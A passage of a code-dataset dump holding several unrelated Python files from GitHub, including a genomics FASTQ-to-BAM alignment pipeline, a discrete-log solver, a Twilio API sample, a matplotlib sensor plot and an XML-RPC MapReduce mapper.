explorer.text(\"Motor 2: Forwards\", 20, 200, 200)\n explorer.set_motor(1, 0, 1)\n else:\n explorer.text(\"Motor 2: Backwards\", 20, 200, 200)\n explorer.set_motor(1, 1, 1)\n\n i = i + 20\n if i > 1000:\n i = 1\n\n explorer.update()\n time.sleep(0.01)\n","repo_name":"clipstick/projects","sub_path":"Development/Python/Badger2040/pimoroni-pico/micropython/examples/pico_explorer/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"27945988400","text":"'''\nNovember 24, 2017, cjyoon@kaist.ac.kr\nwrapper script to process fastq files into a bam file, adapted from ayh's dnaautoaligner.py\ncurrently only supports BWA alignment for WGS, but can be adapted to RNA-seq alignment\nAfter aligning into a bam, uses Picard's mark duplicate, GATK's indel realigner and base recalibration for final processed bam.\n\nJan 4, 2018 added cleanup module which included option to keep intermediate files per KISTI's request\n'''\n\nimport os\nimport subprocess\nimport sys\nimport yaml\nimport argparse\nimport shlex\nimport re\n\ndef configPath(configurationPath):\n '''configures the path to softwares and input files from a yaml file'''\n with open(configurationPath, 'r') as f:\n pathMaps = yaml.safe_load(f)\n\n try:\n #print(pathMaps)\n JAVAPATH = pathMaps['JAVAPATH']\n PICARDPATH = pathMaps['PICARDPATH']\n GATKPATH = pathMaps['GATKPATH']\n SAMTOOLSPATH = pathMaps['SAMTOOLSPATH']\n BWAPATH = pathMaps['BWAPATH']\n knownIndelPath = pathMaps['knownIndelPath']\n dbSnpPath = pathMaps['dbSnpPath']\n referencePath = pathMaps['referencePath']\n except KeyError:\n print('one of the required input path not specified. Exiting...')\n\n return JAVAPATH, PICARDPATH, GATKPATH, SAMTOOLSPATH, BWAPATH, knownIndelPath, dbSnpPath, referencePath\n\ndef argument_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', default=os.path.dirname(os.path.realpath(__file__)) + '/config.yml', help='yaml file that can configure absolute paths to executable and databases')\n parser.add_argument('-m', '--memory', default=8, help='memory to allocate for Picard Java operation')\n parser.add_argument('-s', '--sampleID', required=True, help='sample name to be added to the header with @RG SM:')\n parser.add_argument('-t', '--thread', default=4, help='number of threads to be used for samtools processes')\n parser.add_argument('-n', '--ncore', default=4, help='number of multicore to utilize')\n parser.add_argument('-f1', '--fastq1', required=True, help='FASTQ Read1 path')\n parser.add_argument('-f2', '--fastq2', required=True, help='FASTQ Read2 path')\n parser.add_argument('-o', '--outputDIR', required=False, default=os.getcwd(), help='path to which aligned bams will be written')\n #parser.add_argument('-r', '--referencePath', required=True, help='reference FASTA path')\n parser.add_argument('-d', '--dryrun', required=False, default=False, help='print out the command lines, but do not actually run those', type=bool)\n parser.add_argument('--clean', required=False, default=1, choices=[0, 1], type=int, help='If set to 0, then keep all intermediate files, if set to 1, then clean up all intermediate files')\n args = parser.parse_args()\n\n return args.config, args.fastq1, args.fastq2, args.sampleID, args.memory, args.thread, args.ncore, args.outputDIR, args.dryrun, args.clean\n\ndef execute(commandline, dryrun=False):\n ''' Run the command line string as shell script. 
\n If dryrun is True, just print out the command without actually running it'''\n \n if dryrun:\n print(commandline)\n else:\n proc = subprocess.Popen(shlex.split(commandline))\n proc.wait()\n\n return 0\n\ndef indexBam(SAMTOOLSPATH, bamPath, dryrun=False):\n '''indexes the given bam'''\n indexBamCMD = f'{SAMTOOLSPATH} index -@ 4 {bamPath}'\n execute(indexBamCMD, dryrun)\n\n return bamPath\n\ndef align_sort(fq1, fq2, sampleName, referencePath, BWAPATH, SAMTOOLSPATH, outputDIR, nthread=4, dryrun=False, clean=1):\n ''' performs BWA mem alignment and sorting'''\n alignedSam = f'{outputDIR}/{sampleName}.sam'\n alignedBam = f'{outputDIR}/{sampleName}.bam'\n alignedSortedBam = f'{outputDIR}/{sampleName}.sorted.bam'\n\n alignCMD = f'{BWAPATH} mem -v 1 -t {nthread} -R \"@RG\\\\tID:{sampleName}\\\\tSM:{sampleName}\\\\tPL:ILLUMINA\" {referencePath} {fq1} {fq2}'\n if os.path.isfile(alignedBam):\n pass\n else:\n # align to sam file\n if dryrun:\n print(alignCMD)\n else:\n with open(alignedSam, 'w') as f:\n alignExecute = subprocess.Popen(shlex.split(alignCMD), stdout=f)\n alignExecute.wait()\n\n print('### Done aligning to SAM')\n # convert sam to bam \n sam2bamCMD = f'{SAMTOOLSPATH} view -bS -O BAM -o {alignedBam} {alignedSam}'\n execute(sam2bamCMD, dryrun)\n if clean==1:\n cleanup([alignedSam], dryrun)\n\n print('### Done converting SAM to BAM')\n\n # sort bam\n bamsortCMD = f'{SAMTOOLSPATH} sort -T {outputDIR}/{sampleName}.sorting -@ {nthread} -O bam -o {alignedSortedBam} {alignedBam}'\n execute(bamsortCMD, dryrun)\n if clean==1:\n cleanup([alignedBam], dryrun)\n print('### Done sorting BAM')\n\n # index aligned and sorted bam \n indexBam(SAMTOOLSPATH, alignedSortedBam, dryrun)\n print('### Done indexing aligned and sorted BAM')\n\n return os.path.abspath(alignedSortedBam)\n\ndef markduplicate(JAVAPATH, PICARDPATH, bamPath, dryrun, clean=1):\n '''mark duplicate of the input bam'''\n markedBam = re.sub(string=bamPath, pattern=r'\.bam$', repl='.md.bam')\n # input index bai\n inputBai = f'{bamPath}.bai'\n\n metricTxt = re.sub(string=bamPath, pattern=r'\.bam$', repl='.md.txt')\n tmp_dir = os.path.dirname(bamPath) \n\n mdCMD = f'{JAVAPATH} -XX:ParallelGCThreads=8 -Xmx8g -jar {PICARDPATH} MarkDuplicates REMOVE_DUPLICATES=true REMOVE_SEQUENCING_DUPLICATES=true I={bamPath} O={markedBam} M={metricTxt} VALIDATION_STRINGENCY=LENIENT TMP_DIR={tmp_dir} QUIET=true'\n\n if os.path.isfile(markedBam):\n pass\n else:\n execute(mdCMD, dryrun)\n if clean==1:\n cleanup([bamPath, inputBai], dryrun)\n print('### Done marking duplicates')\n\n return os.path.abspath(markedBam)\n\ndef realign(JAVAPATH, GATKPATH, referencePath, bamPath, knownIndelPath, dryrun, clean=1):\n '''creates indel realigner target from known indels -> realigns the provided bam '''\n\n realignTargetInterval = re.sub(string=bamPath, pattern=r'\.bam$', repl='.intervals')\n realignedBam = re.sub(string=bamPath, pattern=r'\.bam$', repl='.indel.bam')\n realignedBai = re.sub(string=bamPath, pattern=r'\.bam$', repl='.indel.bai')\n\n # input index bai\n inputBai = f'{bamPath}.bai'\n\n if os.path.isfile(realignedBam):\n pass\n else:\n\n realignIntervalCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T RealignerTargetCreator -R {referencePath} -I {bamPath} --known {knownIndelPath} -o {realignTargetInterval}'\n execute(realignIntervalCMD, dryrun)\n\n realignBamCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T IndelRealigner -R {referencePath} -I {bamPath} -targetIntervals {realignTargetInterval} -o {realignedBam}'\n execute(realignBamCMD, dryrun)\n if 
clean==1:\n cleanup([bamPath, inputBai], dryrun)\n\n print('### Done realigning around indels')\n\n return os.path.abspath(realignedBam)\n\ndef baserecalibrator(JAVAPATH, GATKPATH, referencePath, bamPath, dbSnpPath, knownIndelPath, dryrun, clean=1):\n '''recalibrates base quality'''\n \n recalibrateTable = re.sub(string=bamPath, pattern=r'\.bam$', repl='.table')\n recalibratedBam = re.sub(string=bamPath, pattern=r'\.bam$', repl='.br.bam')\n\n # input index bai\n inputBai = re.sub(string=bamPath, pattern=r'\.bam$', repl='.bai')\n\n if os.path.isfile(recalibratedBam):\n pass\n else:\n baserecalibrateTableCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T BaseRecalibrator -R {referencePath} -I {bamPath} -knownSites {dbSnpPath} --knownSites {knownIndelPath} -o {recalibrateTable}'\n execute(baserecalibrateTableCMD, dryrun)\n\n baserecalibrateCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T PrintReads -R {referencePath} -I {bamPath} -BQSR {recalibrateTable} -o {recalibratedBam} -nct 8'\n execute(baserecalibrateCMD, dryrun)\n if clean==1:\n cleanup([bamPath, inputBai], dryrun)\n print('### Done recalibrating base quality')\n\n return os.path.abspath(recalibratedBam)\n\ndef cleanup(intermediateFileList, dryrun):\n '''removes all the intermediate files that are not necessary'''\n for f in intermediateFileList:\n cleanupCMD = 'rm -rf ' + f\n execute(cleanupCMD, dryrun)\n\n return 0\n\ndef main():\n config, fastq1, fastq2, sampleID, memory, thread, ncore, outputDIR, dryrun, clean = argument_parser()\n\n # Configure executable and database paths\n JAVAPATH, PICARDPATH, GATKPATH, SAMTOOLSPATH, BWAPATH, knownIndelPath, dbSnpPath, referencePath = configPath(config)\n\n # BWA MEM align and sort\n alignedBam = align_sort(fastq1, fastq2, sampleID, referencePath, BWAPATH, SAMTOOLSPATH, outputDIR, thread, dryrun, clean)\n # mark duplicate\n markedBam = markduplicate(JAVAPATH, PICARDPATH, alignedBam, dryrun, clean)\n indexBam(SAMTOOLSPATH, markedBam, dryrun)\n\n # indel realign\n realignedBam = realign(JAVAPATH, GATKPATH, referencePath, markedBam, knownIndelPath, dryrun, clean)\n\n # base recalibrate\n recalibratedBam = baserecalibrator(JAVAPATH, GATKPATH, referencePath, realignedBam, dbSnpPath, knownIndelPath, dryrun, clean)\n\n if dryrun:\n print('### This was a dry run')\n else:\n print(f'### Analysis ready bam is located {os.path.abspath(recalibratedBam)}')\n\n return 0\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ju-lab/autoaligner","sub_path":"fastq2bam.py","file_name":"fastq2bam.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
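On the `--dryrun` fix above: the flag was originally declared with `type=bool`, but argparse applies `bool()` to the raw string, and any non-empty string (including `'False'`) is truthy, which is why the edit switches it to `store_true`. A minimal sketch of the pitfall and the fix:

```python
import argparse

# bool('False') is True, so type=bool silently misparses; store_true avoids that.
parser = argparse.ArgumentParser()
parser.add_argument('--dryrun', action='store_true',
                    help='print the commands without running them')

assert parser.parse_args([]).dryrun is False
assert parser.parse_args(['--dryrun']).dryrun is True
```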
+{"seq_id":"28954907871","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anim\nfrom collections import deque\nimport random\nimport ping\n\n\nif not os.getegid() == 0:\n sys.exit('Script must be run as root')\n\n\n__author__ = \"David Cotterill-Drew\"\n__copyright__ = \"Copyright 2014, RoboTonics\"\n__credits__ = [\"David Cotterill-Drew\"]\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = __author__\n__email__ = \"roboshopz@gmail.com\"\n\nMAX_X=100 \t# Width of graph\nMAX_Y=1000 \t# Height of graph \nsonar=0\n\n# initialise line to horizontal line on 0\n\nline=deque([0,0]*MAX_X,maxlen=MAX_X)\n\n\n\ndef update(fn, l2d):\n\t# simulate data[from serial within +-5 of last datapoint\n\tsonar=ping.distance_Ff()\n\tdy=sonar\n\t# add new point to deque\n\tline.append(line[MAX_X-1]+dy)\n\t# set the l2d to the new line coords\n\t# args are ([x-coords],[y-coords])\n\tl2d.set_data(range(-MAX_X/2,MAX_X/2), line)\n\nfig=plt.figure()\n\n# make the axes revolve around [0,0] at the centre\n# instead of the x-axis being 0 to +100, make it -50 to +50\n# ditto for y-axis -512 to +512\n\na=plt.axes(xlim=(-(MAX_X/2),MAX_X/2),ylim=(-(MAX_Y/2),MAX_Y/2))\nl1,=a.plot([], [])\nani=anim.FuncAnimation(fig,update,fargs=(l1,),interval=50)\n\n\nplt.show()","repo_name":"Robotonics/LinuxBot","sub_path":"sensorplot.py","file_name":"sensorplot.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"26190523990","text":"from myprime import MyPrime\r\n\r\nclass DLP:\r\n # dengan algoritma Silver-Pohlig-Hellman\r\n def shpDiscreteLog(self, base, log, prime):\r\n myPrime = MyPrime()\r\n \r\n primeMin1 = prime - 1\r\n\r\n # temukan faktor distinct primes\r\n distinctPrimes = self.findDistinctPrimes(primeMin1)\r\n pj = getattr(distinctPrimes, \"pj\")\r\n aj = getattr(distinctPrimes, \"aj\")\r\n B = log\r\n Bderet = []\r\n #ini adalah B[0]\r\n Bderet.append(B)\r\n b = []\r\n j = 0\r\n ej = []\r\n ejmcrt = []\r\n ejM = {}\r\n \r\n # hitung nilai e\r\n # untuk setiap pj\r\n for item in pj:\r\n j = j + 1\r\n # hitung b0\r\n # temukan k\r\n k = 0\r\n \r\n pangkatBase = 0\r\n pangkatB0 = 0\r\n # pastikan terlebih dahulu bahwa pangkat masing-masing\r\n # sisi (alpha dan BO) berupa bilangan bulat\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = (prime - 1) * k // item\r\n else:\r\n # jika hasil pembagian tidak 0\r\n # maka harus menemukan bilangan x yang\r\n # kongruen terhadap ((prime - 1) * k) % item\r\n x = 1\r\n a = (prime-1) * k % prime\r\n b = (item * x) % prime\r\n # selama masih belum kongruen, temukan x yang memenuhi\r\n while(a != b):\r\n x = x + 1\r\n b = (item * x) % prime\r\n # setelah ditemukan x yang tepat, maka pangkatBase adalah x\r\n pangkatBase = x\r\n \r\n # sama dengan di atas, jika hasil pembagian tidak bulat\r\n tem = (prime - 1) % item\r\n if (tem == 0):\r\n pangkatB0 = (prime - 1) // item\r\n else:\r\n x = 1\r\n a = (prime-1) % prime\r\n b = (item * x) % prime\r\n while(a != b):\r\n x = x + 1\r\n b = (item * x) % prime\r\n pangkatB0 = x\r\n\r\n # pada tahap ini, pangkat alpha dan B0 telah ditemukan\r\n # selanjutnya lakukan iterasi sampai didapati k yang tepat\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n n = myPrime.modExp(Bderet[0], pangkatB0, prime)\r\n\r\n while(m != n):\r\n k = k + 1\r\n\r\n # pastikan terlebih dahulu bahwa pangkat masing-masing\r\n # sisi (alpha dan BO) berupa bilangan bulat\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = (prime - 1) * k // item\r\n else:\r\n # jika hasil pembagian tidak 0\r\n # maka harus menemukan bilangan x yang\r\n # kongruen terhadap ((prime - 1) * k) % item\r\n x = 1\r\n p = (prime-1) * k % prime\r\n q = (item * x) % prime\r\n # selama masih belum kongruen, temukan x yang memenuhi\r\n while(p != q):\r\n x = x + 1\r\n q = (item * x) % prime\r\n # setelah ditemukan x yang tepat, maka pangkatBase adalah x\r\n pangkatBase = x\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n\r\n # ini adalah b0 \r\n b.append(k)\r\n \r\n # =============================================\r\n # sampai pada tahap ini, b0 = k sudah ditemukan\r\n # selanjutnya, kita akan mencari nilai bi\r\n # untuk setiap i = 1, 2, .. 
,aj - 1\r\n for i in range(1, aj[item]):\r\n # determine Bi = B * (base ^ -(sigma k=0 to i-1 of ((bk^j) ^ (pj^k))))\r\n # the following loop computes the exponent of base (the sigma sum)\r\n sigma = 0\r\n for k in range(0, i):\r\n sigma = sigma + (b[k] ** j) * (item ** k)\r\n\r\n # sigma is effectively multiplied by minus 1, i.e. the exponent is negative\r\n # since the exponent is negative, we must find the modular inverse;\r\n # but first, if the exponent is not 1, reduce it to the power-1 case,\r\n # then find its modular inverse.\r\n tempBase = base\r\n if(sigma != 1):\r\n tempBase = base ** sigma\r\n sigma = -1\r\n invTempBase = myPrime.inversMod(tempBase, prime)\r\n # this is Bderet[i]\r\n Bderet.append((B * invTempBase) % prime)\r\n # at this stage Bi has been found, so iterate to find a value\r\n # k satisfying Bi ^ ((p-1) / (pj ^ (i+1))) congruent to base ^ ((p-1) * (bi^j) / pj) (mod prime)\r\n\r\n # do the same as when finding b0\r\n k = 0\r\n pangkatBi = 0\r\n pangkatBase = 0\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = (prime - 1) * k // item\r\n else:\r\n x = 1\r\n p = (prime-1) * k % prime\r\n q = (item * x) % prime\r\n while(p != q):\r\n x = x + 1\r\n q = (item * x) % prime\r\n pangkatBase = x\r\n \r\n tem = (prime - 1) % (item ** (i + 1))\r\n if (tem == 0):\r\n pangkatBi = (prime - 1) // (item ** (i + 1))\r\n else:\r\n x = 1\r\n p = (prime - 1) % prime\r\n q = ((item ** (i + 1)) * x) % prime\r\n while(p != q):\r\n x = x + 1\r\n q = ((item ** (i + 1)) * x) % prime\r\n pangkatBi = x\r\n\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n n = myPrime.modExp(Bderet[i], pangkatBi, prime)\r\n\r\n while(m != n):\r\n # advance k, mirroring the b0 search\r\n k = k + 1\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = ((prime - 1) * k) // item\r\n else:\r\n x = 1\r\n p = ((prime-1) * k) % prime\r\n q = (item * x) % prime\r\n while(p != q):\r\n x = x + 1\r\n q = (item * x) % prime\r\n pangkatBase = x\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n\r\n # this is bi\r\n b.append(k)\r\n\r\n # ===================\r\n # up to here, the sequence b[i] for pj has been obtained\r\n # next we will find the value of e for base pj\r\n # by summing the whole b[i] sequence\r\n\r\n tempe = 0\r\n for i in range(0, aj[item]):\r\n tempe = tempe + (b[i] ** j) * (item ** i)\r\n \r\n bentar = tempe % (item ** aj[item])\r\n # this is ej[j]\r\n ej.append(bentar)\r\n ejmcrt.append(item ** aj[item])\r\n # this is the modulus of ej\r\n ejM[bentar] = (item ** aj[item])\r\n x = self.chineseRT(ej, ejmcrt)\r\n x = x % self.lcm(ejmcrt)\r\n reval = HasilSHP(ej, ejM, x)\r\n return reval\r\n\r\n # find the distinct-prime factorization\r\n def findDistinctPrimes(self, primeMin1):\r\n # pj and aj will be filled into reval's attributes\r\n pj = [] # list\r\n aj = {} # dictionary\r\n \r\n # trivial method\r\n pembagi = 2\r\n eksponen = 0\r\n\r\n # try dividing by 2 first; afterwards start from 3\r\n # with an increment of 2\r\n if(((primeMin1 % pembagi) == 0) and (pembagi < (primeMin1 / 2))):\r\n pj.append(pembagi)\r\n while((primeMin1 % pembagi) == 0):\r\n primeMin1 = primeMin1 // pembagi\r\n eksponen = eksponen + 1\r\n aj[pembagi] = eksponen\r\n\r\n # from here on the divisor starts at 3\r\n pembagi = pembagi + 1\r\n\r\n # reset the exponent\r\n eksponen = 0\r\n\r\n # while the divisor is still < primeMin1 / 2\r\n while(pembagi < (primeMin1 / 2)):\r\n while((primeMin1 % pembagi) == 0):\r\n primeMin1 = primeMin1 // pembagi\r\n eksponen = eksponen + 1\r\n 
if(eksponen > 0):\r\n pj.append(pembagi)\r\n aj[pembagi] = eksponen\r\n # reset the exponent\r\n eksponen = 0\r\n\r\n # once it can no longer be divided,\r\n # increase the divisor by 2\r\n pembagi = pembagi + 2\r\n\r\n if(primeMin1 > 1):\r\n pj.append(primeMin1)\r\n aj[primeMin1] = 1\r\n \r\n reval = DistinctPrimes()\r\n # Set attribute\r\n setattr(reval, 'pj', pj)\r\n setattr(reval, 'aj', aj)\r\n return reval\r\n\r\n def chineseRT(self, listA, listMod):\r\n myPrime = MyPrime()\r\n M = 1\r\n\r\n # compute the LCM of every modulus\r\n # NOT DONE HERE YET\r\n\r\n # compute the value of M\r\n for i in range(len(listMod)):\r\n M = M * listMod[i]\r\n\r\n listM = []\r\n # compute M/m for every value of m\r\n for i in range(len(listMod)):\r\n temp = M // listMod[i]\r\n listM.append(temp)\r\n\r\n # compute the modular inverses\r\n listInvM = []\r\n for i in range(len(listM)):\r\n temp = myPrime.inversMod(listM[i], listMod[i])\r\n listInvM.append(temp)\r\n\r\n # compute x\r\n x = 0\r\n for i in range(len(listA)):\r\n temp = listA[i] * listM[i] * listInvM[i]\r\n x = x + temp\r\n \r\n return x\r\n\r\n def lcm(self, listNumber):\r\n a = 1\r\n b = 1\r\n for item in listNumber:\r\n b = a * item\r\n a = b // self.gcdEuclidean(a, item)\r\n return a\r\n\r\n # find the gcd of two numbers\r\n # using the Euclidean algorithm\r\n def gcdEuclidean(self, a, b):\r\n x = 0\r\n while(b != 0):\r\n x = a % b\r\n a = b\r\n b = x\r\n return a\r\n\r\nclass DistinctPrimes:\r\n pj = [] # bases\r\n aj = {} # exponents (powers)\r\n\r\n def showInfo(self):\r\n print(\"The Distinct Primes\")\r\n for item in self.pj:\r\n print(item, \"^\", self.aj[item])\r\n\r\n def hitungProduct(self):\r\n hasil = 1\r\n for item in self.pj:\r\n hasil = hasil * (item ** self.aj[item])\r\n return hasil\r\n\r\nclass HasilSHP:\r\n ej = []\r\n ejM = {}\r\n x = 0\r\n\r\n def __init__(self, initej, initejM, initx):\r\n self.ej = initej\r\n self.ejM = initejM\r\n self.x = initx\r\n \r\n def showInfo(self):\r\n print(\"SHP Result\")\r\n for item in self.ej:\r\n print(item, \"mod\", self.ejM[item])\r\n print(\"x:\", self.x)\r\n\r\ndlp = DLP()\r\nprime = 73\r\nbase = 5\r\nlog = 68\r\nmylist = dlp.shpDiscreteLog(base, log, prime)\r\nej = getattr(mylist, \"ej\")\r\nejM = getattr(mylist, \"ejM\")\r\nmylist.showInfo()\r\n'''print(\"==========\")\r\nprint(\"Testing CRT\")\r\nA = [2,3,2]\r\nB = [3,5,7]\r\nx = dlp.chineseRT(A,B)\r\nprint(x)\r\nprint(\"==========\")\r\nprint(\"Testing LCM\")'''\r\n'''mylist = [3,4,8]\r\nx = dlp.lcm(mylist)\r\nprint(x)'''\r\n","repo_name":"vynhart/skripsi","sub_path":"dlp.py","file_name":"dlp.py","file_ext":"py","file_size_in_byte":11441,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
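For a prime this small, the Silver-Pohlig-Hellman result can be cross-checked by brute force. For the parameters in the test block (base 5, log 68, prime 73) the discrete logarithm is 37, since 5^37 ≡ 68 (mod 73):

```python
# Brute-force cross-check of the discrete log computed above (fine for a 7-bit prime).
base, log, prime = 5, 68, 73
x = next(k for k in range(prime - 1) if pow(base, k, prime) == log)
print(x)                            # 37
assert pow(base, x, prime) == log   # 5**37 % 73 == 68
```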
+{"seq_id":"28325786810","text":"from pathlib import Path\n\ndata_dir = './sartorius-cell-instance-segmentation'\nBATCH_SIZE = 2\nNUM_EPOCHS = 5\n\nTRAIN_CSV = f\"{data_dir}/train.csv\"\nTRAIN_PATH = f\"{data_dir}/train\"\nTEST_PATH = f\"{data_dir}/test\"\nTRAIN_FILES = sorted(list(Path(TRAIN_PATH).rglob('*png')))\n\n\nROOT = Path(data_dir)\nTRAIN_PATH_ = Path(TRAIN_PATH)\n\nWIDTH = 704\nHEIGHT = 520\n# Threshold for mask length\nTH = 40\nBATCH_SIZE = 2\nLR = 1e-3\nWEIGHT_DECAY = 0.0005\n\n\n# Normalize to resnet mean and std if True.\nRESNET_MEAN = [0.485, 0.456, 0.406]\nRESNET_STD = [0.229, 0.224, 0.225]\nIMAGE_RESIZE = (224, 224)","repo_name":"Paull-dark/Sartorius_Cell_Segmentation","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"4609434003","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nfrom twilio.rest import Client\n\n\n# Your Account Sid and Auth Token from twilio.com/console\n# DANGER! This is insecure. See http://twil.io/secure\naccount_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\nauth_token = 'your_auth_token'\nclient = Client(account_sid, auth_token)\n\nsubscribed_track = client.video \\\n .rooms('RMXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \\\n .participants('PAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \\\n .subscribed_tracks \\\n .update(track='MTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\n\nprint(subscribed_track.name)\n","repo_name":"CodaKris/sample-code","sub_path":"video/v1/subscribed_track/update-default/update-default.6.x.py","file_name":"update-default.6.x.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"3155099040","text":"\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nqueue = []\n\nfor i in range(int(input())):\n command = [int(x) for x in input().split(' ')]\n if command[0] == 1:\n queue.append(command[1])\n elif command[0] == 2:\n queue.pop(0)\n elif command[0] == 3:\n print(queue[0])","repo_name":"IgnatIvanov/HackerRank","sub_path":"3 Months Preparation Kit/Week 08/Queue using Two Stacks/Queue using Two Stacks.py","file_name":"Queue using Two Stacks.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74856517520","text":"#!/usr/bin/env python3\n\n# Import XML RPC server to receive data from the main_node to map\nfrom xmlrpc.server import SimpleXMLRPCServer\n\n# Import XML RPC client to then send the mapped data to the reducer\nimport xmlrpc.client\n\n# Import group by to sort the data that will be separated by which node\nfrom itertools import groupby\n\n\n# Initialize the mapper with an address and port number\n# Start an rpc server to get the data\ndef init_mapper(address, port, mapper_num):\n print(\"Mapper {} ready!\".format(mapper_num))\n server = SimpleXMLRPCServer((address, port), allow_none=True)\n server.register_function(map_data_wordcount, \"map_data_wordcount\")\n server.register_function(map_data_inverted_index, \"map_data_inverted_index\")\n server.serve_forever()\n\n\n# Map the data given from the main node\n# Send it out based on the size of the word by hashing\ndef map_data_wordcount(data, mappers, reducers, address, port):\n values = []\n\n # The reducer node ports are numbered\n reducer_node = mappers + reducers - 1\n\n # Clean up any grammatical things in the word and map it\n # Then create a new array to store the newly mapped data\n # Store it with the respective mapper it will go to, this is done with the hashing function\n for word in data:\n word = word.replace(\".\", \"\")\n word = word.replace(\",\", \"\")\n mapped_word = word + \",1\"\n node_num = hash_word(word, reducers)\n values.append(str(node_num) + \":\" + str(mapped_word))\n\n # Sort the data by the reducer its going to and then group it together\n values.sort(key=lambda x: x[0])\n data = [list(i) for j, i in groupby(values, lambda a: a.split(\":\")[0])]\n\n print(\"Sending to reducers\")\n # For each reducer, send out its designated data over RPC using an rpc client\n for i in range(reducers):\n with xmlrpc.client.ServerProxy(\"http://\" + address + \":\" + str(port + reducer_node)) as proxy:\n proxy.get_map_wordcount(data[i], mappers, i, address, port)\n\n\n# Map the data given from the main node\n# Send it out based on the size of the word by hashing\ndef map_data_inverted_index(data, mappers, reducers, address, port, doc_num):\n mapped = []\n cleaned = []\n\n # Clean up the words for commas and periods\n for word in data:\n word = word.replace(\",\", \"\")\n word = word.replace(\".\", \"\")\n cleaned.append(word)\n\n # Sort the data alphabetically\n cleaned.sort()\n # Group the data together that is the same (based on the word)\n data = [list(i) for j, i in groupby(cleaned)]\n\n # Go through each set of data (like words) and add its designation by hashing from word length\n for i in data:\n occur = len(i)\n word = i[0]\n hash_value = hash_word(word, reducers)\n mapped.append(str(hash_value) + \":\" + str(word) + \",\" + str(doc_num) + \"-\" + str(occur))\n\n # Sort the data based on the reducer it is going to\n mapped.sort()\n chunks = [list(i) for j, i in groupby(mapped, lambda a: a.split(\":\")[0])]\n\n print(\"Sending to reducers\")\n # Go through all of the data and sent it to its designated reducer\n for i in range(len(chunks)):\n with xmlrpc.client.ServerProxy(\"http://\" + address + \":\" + str(port + mappers + i)) as proxy:\n proxy.get_map_inverted_index(chunks[i], mappers, i, address, port)\n\n\n# Return N - 1 reducer to send to based on the length % number of reducers\ndef hash_word(word, reducers):\n return len(word) % 
reducers\n","repo_name":"compact-disc/MapReduce","sub_path":"mapper_node.py","file_name":"mapper_node.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
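The routing above hinges on `hash_word`: identical words always have the same length, so they always land on the same reducer, which is what lets each reducer aggregate its keys independently. Tiny illustration with three reducers:

```python
def hash_word(word, reducers):
    return len(word) % reducers

words = ["map", "reduce", "shuffle", "sort"]
print({w: hash_word(w, 3) for w in words})
# {'map': 0, 'reduce': 0, 'shuffle': 1, 'sort': 1} -- equal words collide on purpose
```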
+{"seq_id":"70584643603","text":"#!/usr/bin/env python\n\n'''similarities.py : similarity calculations\n\nMain task: take entities list at DF_ENT_CSV and calculate a similarities\nmatrix for a filtered subset of the entities, saved to csv_out (command line\nargument)\n'''\n\nimport pandas as pd\nfrom scipy import sparse\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sys import argv\n\nDF_ENT_CSV = '/home/abirdsall/insight/histmark/data/190128-df-ent.csv'\n\ndef load_df_ent():\n df_ent = pd.read_csv(DF_ENT_CSV)\n return df_ent\n\ndef entities_to_encode(df_ent):\n # only include entities that appear on at least two plaques\n mrkrs_per_ent = df_ent.groupby('text').marker_id.apply(lambda x: len(x.unique()))\n ents_to_keep = mrkrs_per_ent[mrkrs_per_ent>1].index.values\n df_ent = df_ent[df_ent.text.isin(ents_to_keep)]\n return df_ent\n\ndef encode_entities_binary(df_ent):\n # prep df to binary encode each entity as feature\n entity_marker_df = df_ent.loc[:,['text','marker_id']].rename(columns={'text':'entity'})\n grouped = entity_marker_df.groupby('marker_id').entity.apply(lambda lst: tuple((k, 1) for k in lst))\n category_dicts = [dict(tuples) for tuples in grouped]\n v = DictVectorizer(sparse=False)\n\n X = v.fit_transform(category_dicts)\n\n # df_ent_obs is dataframe where each column is feature\n df_ent_obs = pd.DataFrame(X, columns=v.get_feature_names(), index=grouped.index)\n A_sparse = sparse.csr_matrix(df_ent_obs)\n 